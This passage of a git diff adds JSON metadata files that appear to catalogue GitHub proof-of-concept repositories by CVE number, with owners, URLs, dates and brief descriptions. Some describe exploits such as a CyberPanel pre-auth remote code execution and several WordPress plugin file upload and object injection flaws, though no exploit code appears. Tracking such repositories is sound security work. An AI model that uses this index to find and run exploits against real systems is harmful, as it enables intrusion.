"2024-11-15T13:25:58Z", + "pushed_at": "2024-11-09T02:57:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51136.json b/2024/CVE-2024-51136.json new file mode 100644 index 0000000000..73d7e16961 --- /dev/null +++ b/2024/CVE-2024-51136.json @@ -0,0 +1,33 @@ +[ + { + "id": 883458684, + "name": "CVE-2024-51136-POC", + "full_name": "JAckLosingHeart\/CVE-2024-51136-POC", + "owner": { + "login": "JAckLosingHeart", + "id": 57932150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57932150?v=4", + "html_url": "https:\/\/github.com\/JAckLosingHeart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JAckLosingHeart\/CVE-2024-51136-POC", + "description": null, + "fork": false, + "created_at": "2024-11-05T02:04:01Z", + "updated_at": "2024-11-05T02:04:59Z", + "pushed_at": "2024-11-05T02:04:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51179.json b/2024/CVE-2024-51179.json new file mode 100644 index 0000000000..8828e9b500 --- /dev/null +++ b/2024/CVE-2024-51179.json @@ -0,0 +1,33 @@ +[ + { + "id": 885336150, + "name": "CVE-2024-51179", + "full_name": "Lakshmirnr\/CVE-2024-51179", + "owner": { + "login": "Lakshmirnr", + "id": 172017730, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172017730?v=4", + "html_url": "https:\/\/github.com\/Lakshmirnr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lakshmirnr\/CVE-2024-51179", + "description": null, + "fork": false, + "created_at": "2024-11-08T11:47:07Z", + "updated_at": "2024-11-28T12:07:11Z", + "pushed_at": "2024-11-08T18:42:51Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5124.json b/2024/CVE-2024-5124.json new file mode 100644 index 0000000000..b7c5436835 --- /dev/null +++ b/2024/CVE-2024-5124.json @@ -0,0 +1,33 @@ +[ + { + "id": 880757168, + "name": "CVE-2024-5124", + "full_name": "gogo2464\/CVE-2024-5124", + "owner": { + "login": "gogo2464", + "id": 57051187, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57051187?v=4", + "html_url": "https:\/\/github.com\/gogo2464", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gogo2464\/CVE-2024-5124", + "description": null, + "fork": false, + "created_at": "2024-10-30T09:53:42Z", + "updated_at": "2024-11-03T11:49:39Z", + "pushed_at": "2024-11-03T11:49:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51358.json b/2024/CVE-2024-51358.json new file mode 100644 index 0000000000..34cd969ea3 --- /dev/null +++ b/2024/CVE-2024-51358.json @@ -0,0 +1,33 @@ +[ + { + "id": 882335500, + "name": "CVE-2024-51358", + "full_name": "Kov404\/CVE-2024-51358", + "owner": { + "login": "Kov404", + "id": 177751667, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/177751667?v=4", + "html_url": "https:\/\/github.com\/Kov404", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kov404\/CVE-2024-51358", + "description": null, + "fork": false, + "created_at": "2024-11-02T14:55:00Z", + "updated_at": "2024-11-02T14:56:08Z", + "pushed_at": "2024-11-02T14:56:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51378.json b/2024/CVE-2024-51378.json new file mode 100644 index 0000000000..b9b23ffcd8 --- /dev/null +++ b/2024/CVE-2024-51378.json @@ -0,0 +1,33 @@ +[ + { + "id": 880552224, + "name": "CVE-2024-51378", + "full_name": "refr4g\/CVE-2024-51378", + "owner": { + "login": "refr4g", + "id": 63981656, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63981656?v=4", + "html_url": "https:\/\/github.com\/refr4g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/refr4g\/CVE-2024-51378", + "description": "Exploit for CyberPanel Pre-Auth RCE via Command Injection", + "fork": false, + "created_at": "2024-10-29T23:34:27Z", + "updated_at": "2024-11-24T15:36:46Z", + "pushed_at": "2024-11-01T10:12:49Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51430.json b/2024/CVE-2024-51430.json new file mode 100644 index 0000000000..0809ffea41 --- /dev/null +++ b/2024/CVE-2024-51430.json @@ -0,0 +1,33 @@ +[ + { + "id": 880470583, + "name": "CVE-2024-51430", + "full_name": "BLACK-SCORP10\/CVE-2024-51430", + "owner": { + "login": "BLACK-SCORP10", + "id": 102329978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102329978?v=4", + "html_url": "https:\/\/github.com\/BLACK-SCORP10", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BLACK-SCORP10\/CVE-2024-51430", + "description": "The Online Diagnostic Lab Management System has a security problem called Cross-Site Scripting (XSS) in the Borrower section.", + "fork": false, + "created_at": "2024-10-29T19:32:05Z", + "updated_at": "2024-11-21T09:14:45Z", + "pushed_at": "2024-10-29T19:40:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51435.json b/2024/CVE-2024-51435.json new file mode 100644 index 0000000000..584d208924 --- /dev/null +++ b/2024/CVE-2024-51435.json @@ -0,0 +1,33 @@ +[ + { + "id": 878714460, + "name": "CVE-2024-51435", + "full_name": "bevennyamande\/CVE-2024-51435", + "owner": { + "login": "bevennyamande", + "id": 10162710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10162710?v=4", + "html_url": "https:\/\/github.com\/bevennyamande", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bevennyamande\/CVE-2024-51435", + "description": "bloodbank POCs", + "fork": false, + "created_at": "2024-10-25T23:28:09Z", + "updated_at": "2024-10-28T18:47:29Z", + "pushed_at": "2024-10-25T23:50:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51567.json b/2024/CVE-2024-51567.json new file mode 100644 index 0000000000..d66894d6b4 --- /dev/null +++ b/2024/CVE-2024-51567.json @@ -0,0 +1,98 @@ +[ + { + "id": 881591080, + "name": "CVE-2024-51567", + "full_name": "ajayalf\/CVE-2024-51567", + "owner": { + "login": "ajayalf", + "id": 49350537, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49350537?v=4", + "html_url": "https:\/\/github.com\/ajayalf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ajayalf\/CVE-2024-51567", + "description": "CVE-2024-51567 is a Python PoC exploit targeting an RCE vulnerability in CyberPanel v2.3.6’s upgrademysqlstatus endpoint, bypassing CSRF protections.", + "fork": false, + "created_at": "2024-10-31T21:55:57Z", + "updated_at": "2024-11-07T14:48:36Z", + "pushed_at": "2024-11-01T10:48:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-51567", + "cyberpanel" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884847468, + "name": "CVE-2024-51567-RCE-EXPLOIT", + "full_name": "thehash007\/CVE-2024-51567-RCE-EXPLOIT", + "owner": { + "login": "thehash007", + "id": 108442682, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108442682?v=4", + "html_url": "https:\/\/github.com\/thehash007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thehash007\/CVE-2024-51567-RCE-EXPLOIT", + "description": "cbyerpanel rce exploit", + "fork": false, + "created_at": "2024-11-07T13:52:37Z", + "updated_at": "2024-11-07T13:57:28Z", + "pushed_at": "2024-11-07T13:57:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 894240840, + "name": "cve-2024-51567-poc", + "full_name": "XiaomingX\/cve-2024-51567-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-51567-poc", + "description": "CVE-2024-51567 is a Python PoC exploit targeting an RCE vulnerability in CyberPanel v2.3.6’s upgrademysqlstatus endpoint, bypassing CSRF protections.", + "fork": false, + "created_at": "2024-11-26T02:18:24Z", + "updated_at": "2024-11-26T02:21:25Z", + "pushed_at": "2024-11-26T02:21:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51665.json b/2024/CVE-2024-51665.json new file mode 100644 index 0000000000..7b37f57011 --- /dev/null +++ b/2024/CVE-2024-51665.json @@ -0,0 +1,33 @@ +[ + { + "id": 886174697, + "name": "CVE-2024-51665", + "full_name": "RandomRobbieBF\/CVE-2024-51665", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-51665", + "description": "Magical Addons For Elementor <= 1.2.1 - Authenticated (Subscriber+) Server-Side Request Forgery", + "fork": false, + "created_at": "2024-11-10T12:01:52Z", + "updated_at": "2024-11-15T13:23:56Z", + "pushed_at": "2024-11-10T12:02:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51747.json b/2024/CVE-2024-51747.json new file mode 100644 index 0000000000..c62dad4c9e --- /dev/null +++ b/2024/CVE-2024-51747.json @@ -0,0 +1,33 @@ +[ + { + "id": 888811330, + "name": "CVE-2024-51747", + "full_name": "l20170217b\/CVE-2024-51747", + "owner": { + "login": "l20170217b", + "id": 153576205, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153576205?v=4", + "html_url": "https:\/\/github.com\/l20170217b", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l20170217b\/CVE-2024-51747", + "description": null, + "fork": false, + "created_at": "2024-11-15T03:40:49Z", + "updated_at": "2024-11-18T12:40:30Z", + "pushed_at": "2024-11-15T04:00:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52301.json b/2024/CVE-2024-52301.json new file mode 100644 index 0000000000..f19fd81769 --- /dev/null +++ b/2024/CVE-2024-52301.json @@ -0,0 +1,64 @@ +[ + { + "id": 888639868, + "name": "CVE-2024-52301", + "full_name": "Nyamort\/CVE-2024-52301", + "owner": { + "login": "Nyamort", + "id": 67233336, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67233336?v=4", + "html_url": "https:\/\/github.com\/Nyamort", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nyamort\/CVE-2024-52301", + "description": null, + "fork": false, + "created_at": "2024-11-14T18:41:31Z", + "updated_at": "2024-11-18T10:25:29Z", + "pushed_at": "2024-11-14T19:27:31Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889180658, + "name": "CVE-2024-52301-Research", + "full_name": "martinhaunschmid\/CVE-2024-52301-Research", + "owner": { + "login": "martinhaunschmid", + "id": 35374703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35374703?v=4", + "html_url": "https:\/\/github.com\/martinhaunschmid", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/martinhaunschmid\/CVE-2024-52301-Research", + "description": "A bit of research around CVE-2024-52301", + "fork": false, + "created_at": "2024-11-15T19:11:35Z", + "updated_at": "2024-11-15T19:42:15Z", + "pushed_at": "2024-11-15T19:42:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52302.json b/2024/CVE-2024-52302.json new file mode 100644 index 0000000000..7e694f320e --- /dev/null +++ b/2024/CVE-2024-52302.json @@ -0,0 +1,33 @@ +[ + { + "id": 888564124, + "name": "CVE-2024-52302", + "full_name": "d3sca\/CVE-2024-52302", + "owner": { + "login": "d3sca", + "id": 86044770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86044770?v=4", + "html_url": "https:\/\/github.com\/d3sca", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d3sca\/CVE-2024-52302", + "description": "common-user-management is a robust Spring Boot application featuring user management services designed to control user access dynamically. There is a critical security vulnerability in the application endpoint \/api\/v1\/customer\/profile-picture. This endpoint allows file uploads without proper validation or restrictions leads to (RCE)", + "fork": false, + "created_at": "2024-11-14T16:04:00Z", + "updated_at": "2024-11-19T06:02:59Z", + "pushed_at": "2024-11-19T06:02:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52316.json b/2024/CVE-2024-52316.json new file mode 100644 index 0000000000..4e613251c7 --- /dev/null +++ b/2024/CVE-2024-52316.json @@ -0,0 +1,33 @@ +[ + { + "id": 891432537, + "name": "CVE-2024-52316", + "full_name": "TAM-K592\/CVE-2024-52316", + "owner": { + "login": "TAM-K592", + "id": 8276702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8276702?v=4", + "html_url": "https:\/\/github.com\/TAM-K592", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAM-K592\/CVE-2024-52316", + "description": "CVE-2024-52316 - Apache Tomcat Authentication Bypass Vulnerability", + "fork": false, + "created_at": "2024-11-20T10:22:50Z", + "updated_at": "2024-11-20T10:40:23Z", + "pushed_at": "2024-11-20T10:40:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52317.json b/2024/CVE-2024-52317.json new file mode 100644 index 0000000000..e14a6841a7 --- /dev/null +++ b/2024/CVE-2024-52317.json @@ -0,0 +1,33 @@ +[ + { + "id": 891891768, + "name": "CVE-2024-52317", + "full_name": "TAM-K592\/CVE-2024-52317", + "owner": { + "login": "TAM-K592", + "id": 8276702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8276702?v=4", + "html_url": "https:\/\/github.com\/TAM-K592", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAM-K592\/CVE-2024-52317", + "description": "CVE-2024-52317 - Apache Tomcat HTTP\/2 Data Leakage Vulnerability", + "fork": false, + "created_at": "2024-11-21T06:20:42Z", + "updated_at": "2024-11-23T18:23:10Z", + "pushed_at": "2024-11-21T06:33:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52318.json b/2024/CVE-2024-52318.json new file mode 100644 index 0000000000..dd9a470c3d --- /dev/null +++ b/2024/CVE-2024-52318.json @@ -0,0 +1,33 @@ +[ + { + "id": 891898238, + "name": "CVE-2024-52318", + "full_name": "TAM-K592\/CVE-2024-52318", + "owner": { + "login": "TAM-K592", + "id": 8276702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8276702?v=4", + "html_url": "https:\/\/github.com\/TAM-K592", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAM-K592\/CVE-2024-52318", + "description": "CVE-2024-52318 - Apache Tomcat XSS Vulnerability in Generated JSPs", + "fork": false, + "created_at": "2024-11-21T06:38:48Z", + "updated_at": "2024-11-21T06:44:43Z", + "pushed_at": "2024-11-21T06:44:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52380.json b/2024/CVE-2024-52380.json new file mode 100644 index 0000000000..acbdfc7028 --- /dev/null +++ b/2024/CVE-2024-52380.json @@ -0,0 +1,33 @@ +[ + { + "id": 893988150, + "name": "CVE-2024-52380", + "full_name": "RandomRobbieBF\/CVE-2024-52380", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-52380", + "description": "Picsmize <= 1.0.0 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2024-11-25T14:56:38Z", + "updated_at": "2024-11-25T14:57:59Z", + "pushed_at": "2024-11-25T14:57:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52382.json b/2024/CVE-2024-52382.json new file mode 100644 index 0000000000..6934fbd626 --- /dev/null +++ b/2024/CVE-2024-52382.json @@ -0,0 +1,33 @@ +[ + { + "id": 892169698, + "name": "CVE-2024-52382", + "full_name": "RandomRobbieBF\/CVE-2024-52382", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-52382", + "description": "Matix Popup Builder <= 1.0.0 - Unauthenticated Arbitrary Options Update", + "fork": false, + "created_at": "2024-11-21T16:19:12Z", + "updated_at": "2024-11-21T16:20:27Z", + "pushed_at": "2024-11-21T16:20:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52429.json b/2024/CVE-2024-52429.json new file mode 100644 index 0000000000..7d79dc6bd6 --- /dev/null +++ b/2024/CVE-2024-52429.json @@ -0,0 +1,33 @@ +[ + { + "id": 892550666, + "name": "CVE-2024-52429", + "full_name": "RandomRobbieBF\/CVE-2024-52429", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-52429", + "description": "WP Quick Setup <= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin\/Theme Installation", + "fork": false, + "created_at": "2024-11-22T10:26:55Z", + "updated_at": "2024-11-27T09:45:27Z", + "pushed_at": "2024-11-22T10:28:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52430.json b/2024/CVE-2024-52430.json new file mode 100644 index 0000000000..1505567a41 --- /dev/null +++ b/2024/CVE-2024-52430.json @@ -0,0 +1,33 @@ +[ + { + "id": 893955029, + "name": "CVE-2024-52430", + "full_name": "RandomRobbieBF\/CVE-2024-52430", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-52430", + "description": "Lis Video Gallery <= 0.2.1 - Unauthenticated PHP Object Injection", + "fork": false, + "created_at": "2024-11-25T13:55:39Z", + "updated_at": "2024-11-25T13:56:56Z", + "pushed_at": "2024-11-25T13:56:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52433.json b/2024/CVE-2024-52433.json new file mode 100644 index 0000000000..f250d44cd4 --- /dev/null +++ b/2024/CVE-2024-52433.json @@ -0,0 +1,33 @@ +[ + { + "id": 892512845, + "name": "CVE-2024-52433", + "full_name": "RandomRobbieBF\/CVE-2024-52433", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-52433", + "description": "My Geo Posts Free <= 1.2 - Unauthenticated PHP Object Injection", + "fork": false, + "created_at": "2024-11-22T08:56:58Z", + "updated_at": "2024-11-22T08:58:31Z", + "pushed_at": "2024-11-22T08:58:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5246.json b/2024/CVE-2024-5246.json new file mode 100644 index 0000000000..b2cef62c5b --- /dev/null +++ b/2024/CVE-2024-5246.json @@ -0,0 +1,33 @@ +[ + { + "id": 837382117, + "name": "CVE-2024-5246", + "full_name": "Abdurahmon3236\/CVE-2024-5246", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-5246", + "description": null, + "fork": false, + "created_at": "2024-08-02T20:56:39Z", + "updated_at": "2024-08-02T20:57:05Z", + "pushed_at": "2024-08-02T20:57:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52475.json b/2024/CVE-2024-52475.json new file mode 100644 index 0000000000..dd057dbbac --- /dev/null +++ b/2024/CVE-2024-52475.json @@ -0,0 +1,33 @@ +[ + { + "id": 892766339, + "name": "CVE-2024-52475", + "full_name": "ubaii\/CVE-2024-52475", + "owner": { + "login": "ubaii", + "id": 31325580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31325580?v=4", + "html_url": "https:\/\/github.com\/ubaii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ubaii\/CVE-2024-52475", + "description": "Broken Authentication in Wordpress plugin (Wawp Plugin < 3.0.18)", + "fork": false, + "created_at": "2024-11-22T18:29:54Z", + "updated_at": "2024-11-22T18:30:35Z", + "pushed_at": "2024-11-22T18:30:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52711.json b/2024/CVE-2024-52711.json new file mode 100644 index 0000000000..0833137e2e --- /dev/null +++ b/2024/CVE-2024-52711.json @@ -0,0 +1,33 @@ +[ + { + "id": 891000517, + "name": "cyberspace-CVE-2024-52711", + "full_name": "14mb1v45h\/cyberspace-CVE-2024-52711", + "owner": { + "login": "14mb1v45h", + "id": 166547152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166547152?v=4", + "html_url": "https:\/\/github.com\/14mb1v45h", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/14mb1v45h\/cyberspace-CVE-2024-52711", + "description": "POC-Proof-of-exploit CVE-2024-52711", + "fork": false, + "created_at": "2024-11-19T14:55:16Z", + "updated_at": "2024-11-19T15:00:18Z", + "pushed_at": "2024-11-19T14:59:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5274.json b/2024/CVE-2024-5274.json new file mode 100644 index 0000000000..6ebc599dfb --- /dev/null +++ b/2024/CVE-2024-5274.json @@ -0,0 +1,64 @@ +[ + { + "id": 826587360, + "name": "CVE-2024-5274-Detection", + "full_name": "Alchemist3dot14\/CVE-2024-5274-Detection", + "owner": { + "login": "Alchemist3dot14", + "id": 63059909, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63059909?v=4", + "html_url": "https:\/\/github.com\/Alchemist3dot14", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alchemist3dot14\/CVE-2024-5274-Detection", + "description": "Guardian Code: A Script to Uncover CVE-2024-5274 Vulnerabilities", + "fork": false, + "created_at": "2024-07-10T02:15:56Z", + "updated_at": "2024-11-20T16:30:56Z", + "pushed_at": "2024-07-10T08:56:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 849326818, + "name": "CVE-2024-5274", + "full_name": "mistymntncop\/CVE-2024-5274", + "owner": { + "login": "mistymntncop", + "id": 105329747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105329747?v=4", + "html_url": "https:\/\/github.com\/mistymntncop", + "user_view_type": "public" + }, + "html_url": 